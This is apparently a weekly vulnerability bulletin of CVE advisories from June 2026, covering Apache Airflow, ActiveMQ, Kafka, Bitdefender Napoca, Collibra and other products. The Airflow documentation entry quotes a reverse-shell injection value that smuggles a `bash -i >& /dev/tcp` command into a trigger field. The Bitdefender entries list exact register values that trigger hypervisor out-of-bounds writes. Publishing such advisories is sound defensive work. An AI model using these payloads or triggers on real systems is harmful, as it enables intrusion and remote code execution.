| Apache Software Foundation--Apache ActiveMQ Broker | Exposure of Sensitive Information Through Metadata vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ, Apache ActiveMQ All. Brokers configured with a network connector that has syncDurableSubs set to true are vulnerable to an unauthenticated attacker who can obtain a list of all durable topic subscriptions in the broker, including client identifiers, subscription names, topic destinations, and JMS selector expressions, by sending a BrokerInfo command. The broker incorrectly responds without first ensuring the connection is authenticated. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49270 | https://lists.apache.org/thread/k3233c1x506z3w7x4z0dqvd86d4v2fr2 |
| Apache Software Foundation--Apache Airflow | A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack - e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem. | 2026-06-01 | not yet calculated | CVE-2026-40861 | https://github.com/apache/airflow/pull/65325 https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl |
| Apache Software Foundation--Apache Airflow | A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint. | 2026-06-01 | not yet calculated | CVE-2026-40961 | https://github.com/apache/airflow/pull/65557 https://lists.apache.org/thread/qmt8ksh7gty6b8hr9w294t94j36jdv1q |
| Apache Software Foundation--Apache Airflow | The structure_data endpoint in the Airflow UI returned external dependency graph nodes for linked Dags without checking whether the caller had read permission on those linked Dags. An authenticated UI/API user authorized for one Dag could enumerate linked Dag IDs and dependency metadata for other Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping to keep Dag dependency topology private across teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-40963 | https://github.com/apache/airflow/pull/65342 https://lists.apache.org/thread/s907bhsksc37m59f0loqjcp1ryobrr60 |
| Apache Software Foundation--Apache Airflow | The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41014 | https://github.com/apache/airflow/pull/65344 https://lists.apache.org/thread/12nbzwwby7g883w2j13gn7ny1545xob9 |
| Apache Software Foundation--Apache Airflow | Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41017 | https://github.com/apache/airflow/pull/65348 https://lists.apache.org/thread/9jx0sk49c1250zflx0q3clc717qgjdch |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` extracted from request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request body entities. Affects deployments that rely on per-Dag edit-scope to keep Task Instance state isolated between teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41084 | https://github.com/apache/airflow/pull/64288 https://lists.apache.org/thread/w0hdcqfr71hf9rl1bwvpjs7q9yp1bldk |
| Apache Software Foundation--Apache Airflow | Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 - the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release. | 2026-06-01 | not yet calculated | CVE-2026-42252 | https://github.com/apache/airflow/pull/64129 https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's Variable response masker caused nested-key redaction (triggered by secret-suffixed key names like `password`, `token`, `secret`, `api_key`) to be bypassed when the JSON value's nesting depth exceeded the shared secrets masker's recursion limit: the masker returned the original nested item before checking the sensitive key name. An authenticated UI/API user with Variable read permission could harvest plaintext secret values stored under sensitive keys nested deep enough to exceed the masker's depth cap. Affects deployments that store sensitive values inside deeply-nested JSON Variables. This is a residual gap in the fix for CVE-2026-32690 (which covered shallower nesting via `max_depth=1`); the depth-limit boundary itself was not raised, so the same key-name bypass pattern reappears beyond the recursion cap. Users who already upgraded for CVE-2026-32690 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the deep-nesting path. | 2026-06-01 | not yet calculated | CVE-2026-42358 | https://github.com/apache/airflow/pull/65912 https://lists.apache.org/thread/33635mv3zjb75wn5453c5yf9trs8x2om |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass. | 2026-06-01 | not yet calculated | CVE-2026-42359 | https://github.com/apache/airflow/pull/65915 https://lists.apache.org/thread/g8dqykpf1p90tysq8tln4qtkqwb1038s https://www.cve.org/CVERecord?id=CVE-2026-33858 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path. | 2026-06-01 | not yet calculated | CVE-2026-42360 | https://github.com/apache/airflow/pull/65906 https://lists.apache.org/thread/obj79bpxnl7r5olz1gsn0g94y88glnl4 |
| Apache Software Foundation--Apache Airflow | A bug in the GET `/api/v2/connections/{connection_id}` REST API endpoint in Apache Airflow allowed an authenticated UI/API user with Connection-read permission to retrieve secrets stored in a Connection's `extra` JSON blob under field names not present in the redaction allowlist (`DEFAULT_SENSITIVE_FIELDS`) - for example, official Slack-provider credential field names were returned in plaintext. Affects deployments that store credentials in Connection `extra` blobs and grant Connection-read access to multiple users. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can store sensitive credential values in a secret-backend rather than inlined into the Connection's `extra` field. | 2026-06-01 | not yet calculated | CVE-2026-45192 | https://github.com/apache/airflow/pull/66673 https://lists.apache.org/thread/r2q93dg2wp5h9sd9vh6y4y5ljqd9crdd |
| Apache Software Foundation--Apache Airflow | Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler - the default on single-host deployments where the DAG bundle is importable from the scheduler process - could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-45360 | https://github.com/apache/airflow/pull/66737 https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83 |
| Apache Software Foundation--Apache Airflow | Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any run of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag; such a worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-45426 | https://github.com/apache/airflow/pull/66749 https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9 |
| Apache Software Foundation--Apache Airflow | The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-46764 | https://github.com/apache/airflow/pull/67112 https://lists.apache.org/thread/ctrbj7q3m86g4qxmo9ponojgmzrcoqpv |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths. | 2026-06-01 | not yet calculated | CVE-2026-48726 | https://github.com/apache/airflow/pull/67289 https://www.cve.org/CVERecord?id=CVE-2025-57735 https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx |
| Apache Software Foundation--Apache Airflow | Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (a network MITM, the typical attack surface when the SMTP relay sits outside the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded. This CVE covers the **core apache-airflow side** of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker. Users are advised to upgrade to `apache-airflow` 3.2.2 or later; users who already applied the SMTP-provider fix from CVE-2026-41016 still need this upgrade to cover the core-side path through `airflow.utils.email`. | 2026-06-01 | not yet calculated | CVE-2026-49267 | https://github.com/apache/airflow/pull/65346 https://lists.apache.org/thread/6v2ds757000msmjmovnnqryqzks83ps0 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's KubernetesExecutor caused JWT tokens used by worker pods to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints - triggering Dag runs, clearing runs, reading or writing Variables / Connections / XComs - as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface - the two fixes are complementary, not duplicates. | 2026-06-01 | not yet calculated | CVE-2026-49298 | https://github.com/apache/airflow/pull/60108 https://lists.apache.org/thread/wo09vrks8189dzsot39rvrx3vnx102tt |
| Apache Software Foundation--Apache Calcite | Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite. This issue affects Apache Calcite: from 1.5.0 before 1.42. Users are recommended to upgrade to version 1.42, which fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-46718 | https://lists.apache.org/thread/9s37svo343w5ck1ovh478lkzcqk4949v |
| Apache Software Foundation--Apache Directory LDAP API | It was identified that the LDAP client implementation in version 2.1.7 does not verify that the server certificate matches the intended LDAP hostname. While the underlying code validates the certificate chain against a trusted authority, the absence of endpoint identification allows a valid certificate issued for an entirely unrelated host to be accepted. This oversight leaves the connection highly vulnerable to server impersonation and complete connection compromise. The root cause of this vulnerability lies in the incomplete TLS server identity verification within the LDAP client implementation. The attacker requires MITM capability on the network to exploit this vulnerability and must be able to present a certificate trusted by the client's configured trust store. Hostname verification is enforced in the new version of the LDAP API. | 2026-06-01 | not yet calculated | CVE-2026-35563 | https://lists.apache.org/thread/5rc2nzqxp1m9wknyf93r8dnp46fhc1nn |
| Apache Software Foundation--Apache Fesod (Incubating) | Server-Side Request Forgery (SSRF) in the UrlImageConverter component of Apache Fesod (Incubating) fesod-sheet before 2.0.2-incubating allows attackers to cause outbound network requests to internal or otherwise restricted resources via a user-supplied image URL. Users are recommended to upgrade to version 2.0.2-incubating, which fixes this issue. | 2026-06-01 | not yet calculated | CVE-2026-49328 | https://github.com/apache/fesod/pull/917 https://github.com/apache/fesod/releases/tag/2.0.2-incubating https://fesod.apache.org/docs/download https://lists.apache.org/thread/c1pb5b66h02p9tlrnfbwcgcz85v16fkj |
| Apache Software Foundation--Apache Fluss (incubating) | Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service. This issue affects Apache Fluss (incubating): 0.8.0 and 0.9.0. Users are recommended to upgrade to version 0.9.1, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49361 | https://lists.apache.org/thread/dccw6tj0njwtmvbftq13mw7fdhsok373 |
| Apache Software Foundation--Apache Fory | Deserialization of Untrusted Data in the Java replace-resolve path in Apache Fory fory-core Java SDK before 1.1.0 on Java/JVM platforms allows a remote attacker to bypass class registration, TypeChecker, and DisallowedList checks and invoke classpath-present readResolve/readExternal hooks via crafted Fory serialized data. Users are recommended to upgrade to version 1.1.0 or later, which fixes this issue. | 2026-06-04 | not yet calculated | CVE-2026-50076 | https://fory.apache.org/security |
| Apache Software Foundation--Apache Kafka | An improper authorization vulnerability has been identified in Apache Kafka. The implementation of the CONSUMER_GROUP_DESCRIBE (69) API validates the DESCRIBE operation on the GROUP resource instead of the READ operation that is documented in the official Kafka documentation and in KIP-848. This discrepancy can result in misconfigured Access Control Lists (ACLs) and unintended security postures, such as granting READ permission to users who should not be able to join/sync groups, or allowing users without READ permission (but with DESCRIBE permission) to access sensitive group metadata. The correct permission for the CONSUMER_GROUP_DESCRIBE API is DESCRIBE on GROUP, so the current implementation is correct; the Kafka documentation and KIP-848 will be updated to reflect that. Kafka users are advised to review existing group ACLs to ensure the principle of least privilege. | 2026-06-02 | not yet calculated | CVE-2026-41115 | https://kafka.apache.org/cve-list |
| Arista Networks--EOS | In Arista's EOS when in 802.1X mode, multi-auth unauthenticated hosts might be allowed access to a switch port if there exists an EAPOL capable device in the fallback VLAN. | 2026-06-04 | not yet calculated | CVE-2024-6858 | https://www.arista.com/en/support/advisories-notices/security-advisory/19917-security-advisory-0103 |
| Arket--Globe Document Intelligence | Cross Site Scripting (XSS) vulnerability in the "Task in Progress / Recent" page in Arket Globe Document Intelligence 5.0.0.559 due to improper sanitization of user input in text fields when creating a new document. Specifically, when an authenticated attacker submits data containing JavaScript code within these fields, the application fails to properly sanitize or escape the content. As a result, the injected script is executed when the page is rendered, allowing the attacker to execute arbitrary JavaScript in the context of other users' browsers who view the affected page. | 2026-06-04 | not yet calculated | CVE-2025-65640 | https://www.arket.it/ https://github.com/vincenzo-emanuele/CVE-2025-65640 |
| bacnet_stack--bacnet_stack 1.3.1 | bacnet_stack 1.3.1 contains an Out-of-bounds Read in bacnet_tag_number_decode which allows attackers to cause a denial of service. | 2026-06-04 | not yet calculated | CVE-2026-38570 | https://github.com/bacnet-stack/bacnet-stack https://github.com/bacnet-stack/bacnet-stack/issues/1270 |
| BINARY--DataDog::DogStatsd | DataDog::DogStatsd versions through 0.07 for Perl allow metric injections from event tags. DataDog::DogStatsd does not properly sanitise input, allowing metric injections of data from untrusted sources. The format_event method (used by the event method) does not validate the content of the tags, which may contain commas (allowing tags to be injected) or newlines, pipes and colons that allow metric injections. (There is an ineffective s/|//g to remove pipes, but because the pipe is not escaped, it is interpreted as a regular expression metacharacter and has no effect.) | 2026-06-05 | not yet calculated | CVE-2026-11362 | https://www.cve.org/CVERecord?id=CVE-2026-46741 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| BINARY--DataDog::DogStatsd | DataDog::DogStatsd versions through 0.07 for Perl allow metric injections. DataDog::DogStatsd does not properly sanitise input, allowing metric injections of data from untrusted sources. The send_stats method does not remove newlines from metric names ($stat variable), allowing attackers to change the metric name prefix. The send_stats method does not validate the content of the value ($delta variable), allowing attackers to inject metrics, especially from methods that do not restrict the data type for the value, such as set, gauge, count and histogram. The send_stats method does not validate the content of the tags, which may contain newlines, pipes and colons that allow metric injections. Note that the SYNOPSIS shows an example of passing a website form "loginName" parameter as a tag, which is unsafe. | 2026-06-05 | not yet calculated | CVE-2026-9270 | https://www.cve.org/CVERecord?id=CVE-2026-46741 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| Bitdefender--Napoca bare-metal hypervisor | Bitdefender Napoca bare-metal hypervisor contains an out-of-bounds write vulnerability in the BIOS INT 0x15 / E820 memory map handler, implemented in napoca/guests/bios_handlers.c. The handler computes a destination offset into the guest RealModeMemory buffer from guest-controlled ES and EDI register values without validating that the resulting address remains within the 1MB RealModeMemory allocation. A malicious guest operating in real mode can trigger the issue by invoking INT 0x15 with AX=0xE820, EDX=0x534D4150, ECX greater than or equal to 20, EBX=0, ES=0xFFFF, and EDI=0xFFFF. This can cause a write of up to 20 bytes past the end of the RealModeMemory buffer into the hypervisor heap. The product is end-of-life and unsupported when assigned. | 2026-06-02 | not yet calculated | CVE-2026-10046 | https://www.bitdefender.com/consumer/support/security-advisories/out-of-bounds-write-in-napoca-bios-int-0x15-e820-memory-map-handler-va-13905 |
| Bitdefender--Napoca bare-metal hypervisor | The Bitdefender Napoca bare-metal hypervisor contains an out-of-bounds write vulnerability in the real-mode hook handler, implemented in napoca/kernel/handler.c. The handler uses a guest-controlled SS:SP-derived offset as an index into the 1MB RealModeMemory buffer without bounds validation. With SS=0xFFFF and ESP=0xFFFF, the computed offset can reach 0x10FFEF, exceeding the RealModeMemory buffer by 65,519 bytes. The IRET frame push can therefore write past the end of the buffer into the hypervisor heap. The product is end-of-life and unsupported when assigned. | 2026-06-02 | not yet calculated | CVE-2026-10047 | https://www.bitdefender.com/support/security-advisories/out-of-bounds-write-in-napoca-real-mode-hook-handler-via-guest-controlled-sssp-va-13905 |
| CloakHQ--CloakBrowser | CloakBrowser is a tool to bypass bot detection tests. Prior to version 0.3.28, the cloakserve CDP multiplexer uses the user-supplied fingerprint query parameter directly as a filesystem path component when creating Chrome profile directories. An unauthenticated attacker who can reach the cloakserve port can supply a crafted fingerprint value containing path traversal sequences to resolve user_data_dir outside the configured data_dir. When Chrome fails to start or the process is cleaned up, shutil.rmtree() deletes the traversed path, resulting in arbitrary directory deletion. Additionally, cloakserve bound to 0.0.0.0 by default, making it network-exposed. This issue has been patched in version 0.3.28. | 2026-06-01 | not yet calculated | CVE-2026-45727 | https://github.com/CloakHQ/CloakBrowser/security/advisories/GHSA-mf33-gv72-w2h5 |
| CloudFoundry Foundation--smb-volume-release | Input validation bypass in SMB volume mount handling in CloudFoundry Foundation diego-release allows low-privileged CF space developer to inject arbitrary kernel CIFS mount options via bypassing the mount-option allowlist, enabling privilege escalation and security control bypass on multi-tenant Diego cells. Affected versions: smb-volume-release: All versions prior to v3.60.0 CF Deployment: All versions prior to v56.0.0 | 2026-06-01 | not yet calculated | CVE-2026-41013 | https://www.cloudfoundry.org/blog/cve-2026-41013-tenant-controlled-comma-smuggles-arbitrary-cifs-mount-options/ |
| Collibra--Collibra Platform (on-prem) | Improper Authentication in the REST API in Collibra Agent allows a remote unauthenticated attacker to access privileged functionality via exposed `/rest/*` endpoints. | 2026-06-02 | not yet calculated | CVE-2026-10622 | https://www.collibra.com/ https://kb.cert.org/vuls/id/873170 |
| Collibra--Collibra Platform (SaaS) | Path traversal in the restore handler in Collibra Agent allows an attacker to write arbitrary files via a crafted ZIP archive. Collibra Agent fails to properly validate and canonicalize file paths during ZIP extraction, which can allow an attacker to write files outside the intended extraction directory. | 2026-06-02 | not yet calculated | CVE-2026-10621 | https://www.collibra.com/ https://kb.cert.org/vuls/id/873170 |
| Concrete CMS--Concrete CMS | Concrete CMS below 9.5.2 is vulnerable to PHP Object Injection via unserialize() calls in the Workflow, Form block, and File/Set components that lack the allowed_classes restriction. An unauthenticated attacker may trigger arbitrary PHP object instantiation if a malicious serialized payload has been placed in the database. Thanks XananasX7 and Sanjorn Keeratirungsan (dizconnect) for both independently reporting. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.4 with vector CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. | 2026-06-03 | not yet calculated | CVE-2026-7888 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/952-release-notes |
| Controller--Controller v12.0.5 | An issue in the cluster-admin:backup-datastore component of Controller v12.0.5 allows attackers to perform a directory traversal via a crafted request. | 2026-06-05 | not yet calculated | CVE-2026-36500 | https://docs.opendaylight.org/en/stable-titanium/release-notes/index.html https://github.com/majdlatah/ODL-Path-Traversal |
| Controller--Controller v12.0.5 | An issue in the Externalizable.readExternal() component of Controller v12.0.5 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-05 | not yet calculated | CVE-2026-36501 | https://docs.opendaylight.org/en/stable-titanium/release-notes/projects/controller.html https://github.com/majdlatah/ODL-Raft-Bug/blob/main/README.md |
| COSIMO--Net::Statsd | Net::Statsd versions before 0.13 for Perl allow metric injections. The metric names are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. The update_stats (used for updating counters) and gauge methods do not check that values are numeric (which would block metric injection). | 2026-06-04 | not yet calculated | CVE-2026-46739 | https://github.com/cosimo/perl5-net-statsd/pull/10 https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| CrowCpp--Crow | CrowCpp Crow through v1.3.1 is vulnerable to HTTP response header injection via unvalidated response header values. | 2026-06-02 | not yet calculated | CVE-2026-38967 | https://github.com/CrowCpp/Crow/issues/1165 https://github.com/CrowCpp/Crow/pull/1167 |
| CRUX--Protocol::HTTP2 | Protocol::HTTP2 versions through 1.12 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory (the "HTTP/2 bomb"). The headers_decode method materialises a full key+value copy per indexed reference with no running size check, and the stream_header_block_add method appends (since version 1.12) every CONTINUATION frame to the per-stream buffer unbounded. MAX_HEADER_LIST_SIZE (default 65536) is advertised in SETTINGS but never consulted on decode. It is absent from the decoder and from the :limits export tag. | 2026-06-06 | not yet calculated | CVE-2026-10725 | https://metacpan.org/release/CRUX/Protocol-HTTP2-1.12/source/lib/Protocol/HTTP2/HeaderCompression.pm#L133 https://metacpan.org/release/CRUX/Protocol-HTTP2-1.12/source/lib/Protocol/HTTP2/Stream.pm#L414 https://security.metacpan.org/patches/P/Protocol-HTTP2/1.12/CVE-2026-10725-r1.patch |
| damasac--thaipalliative_lte | Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in damasac thaipalliative_lte through version 3.0 allow remote attackers to inject arbitrary web script or HTML via the idFormMain parameter (line 24), the id parameter (lines 25, 75), and the ptid_key parameter (lines 26, 42) in /substudy/ezform.php. User input is echoed into HTML attributes and JavaScript contexts without encoding. | 2026-06-05 | not yet calculated | CVE-2026-38579 | https://github.com/damasac/thaipalliative_lte/blob/57b57630fb403eba524533062ef5244e9b7c4380/substudy/ezform.php#L14 https://github.com/theemperorspath/advisories/blob/main/2026/CVE-2026-38579.md |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, a shared-agent editor can delete, through `DELETE /api/files`, file records that the owner has reused across multiple agents. The deletion removes the file globally, not just from the shared agent, so the owner's other private agents (which the attacker has no access to) are left with a stale `file_id` reference that no longer resolves and break silently. This is a cross-agent integrity violation: editing access to one agent should not affect another. Version 0.8.4 contains a patch. | 2026-06-02 | not yet calculated | CVE-2026-44654 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-f8jg-v856-mf6q |
| Devolutions--Server | Improper access control in the PAM account discovery feature in Devolutions Server 2026.1.19 and earlier allows an authenticated user without administrative privileges to delete network discovery scan configurations. | 2026-06-02 | not yet calculated | CVE-2026-9522 | https://devolutions.net/security/advisories/DEVO-2026-0014/ |
| Devolutions--Server | Improper access control in the permission validation component in Devolutions Server 2026.1.19 and earlier allows an authenticated user with entry edit privileges to modify asset information without the required permission. | 2026-06-02 | not yet calculated | CVE-2026-9590 | https://devolutions.net/security/advisories/DEVO-2026-0014/ |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Prior to version 2.4.28, DFIR-IRIS exposes an optional GraphQL endpoint at `/graphql` that does not enforce the same authorization checks as the REST API. Any authenticated user can abuse it in three ways: unauthorized IOC read across cases (IDOR); bulk IOC disclosure via `case.iocs`, where the `case(caseId: …).iocs` resolver returns IOCs linked to an arbitrary case without verifying the caller has access to that case; and unauthorized case creation. All three are reachable by any authenticated user, regardless of role or case ACL. This is fixed in v2.4.28. The GraphQL blueprint, resolvers, and dependencies (`graphene`, `graphene-sqlalchemy`, `graphql-server[flask]`) were removed entirely, since the feature was not in use. As a workaround, block `/graphql` at the reverse proxy (recommended) or comment out the `graphql_blueprint` import and `register_blueprint` call in `source/app/views.py` and restart. | 2026-06-04 | not yet calculated | CVE-2026-41522 | https://github.com/dfir-iris/iris-web/security/advisories/GHSA-3mxh-x92q-9r25 |
